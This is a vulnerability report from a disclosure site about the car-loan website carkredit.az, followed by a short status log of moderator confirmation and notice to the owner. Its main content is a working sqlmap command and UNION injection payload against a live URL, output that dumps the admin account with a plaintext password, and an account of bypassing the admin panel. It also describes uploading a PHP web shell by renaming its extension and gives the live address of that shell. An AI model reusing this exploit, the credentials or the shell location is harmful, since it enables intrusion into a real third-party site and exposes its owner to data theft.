Admin page bypass and Sql injection / shell uploaded

Carkredit.az 15 January 2018, 16:06

Detailed information

Have SQL injection on site.
By using this weakness possible Steal sensitive information from the site (Passwords, site structure, etc.)

[email protected]:~# sqlmap -u http://carkredit.az/az/kurumsal-detay.php?i=1 -D u765618212_cark -T kullanici -C kad,kpasswd --dump
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: i=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkxzq','MeUyGPiVljpzydkvUNiRMvMWFVkLUpITzwPBcBeR'),'qzzqq')-- VhEt
---
[06:56:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.32
back-end DBMS: MySQL 5 (MariaDB fork)
[06:56:56] [INFO] fetching entries of column(s) 'kad, kpasswd' for table 'kullanici' in database 'u765618212_cark'
[06:56:56] [INFO] the SQL query used returns 1 entries
[06:56:56] [INFO] resumed: "[email protected]","adminck"
[06:56:56] [INFO] analyzing table dump for possible password hashes
Database: u765618212_cark
Table: kullanici
[1 entry]
+-------------------+---------+
| kad | kpasswd |
+-------------------+---------+
| [email protected] | adminck |
+-------------------+---------+

When uploading a site image an admin page / panel, it is possible to upload a shell by changing the file name extension of the Burp Suite tool. Apart from entering panel1, no password is required. The site was loaded with a shell for test purposes, but the site was not damaged.

Shell address - http://carkredit.az/images/kurumsal/bhp.php

Comments

  • 06 March 2018, 10:53
    Vulnerability status
    Have not any information from source

  • 17 January 2018, 09:46
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 16 January 2018, 07:44
    Added point to Vulnerability
    Moderator gave 8 point from 10 to vulnerability

  • 16 January 2018, 07:43
    Vulnerability status
    Confirmed by Moderator

  • 15 January 2018, 16:06
    Vulnerability added
    Vulnerability added to BUGemot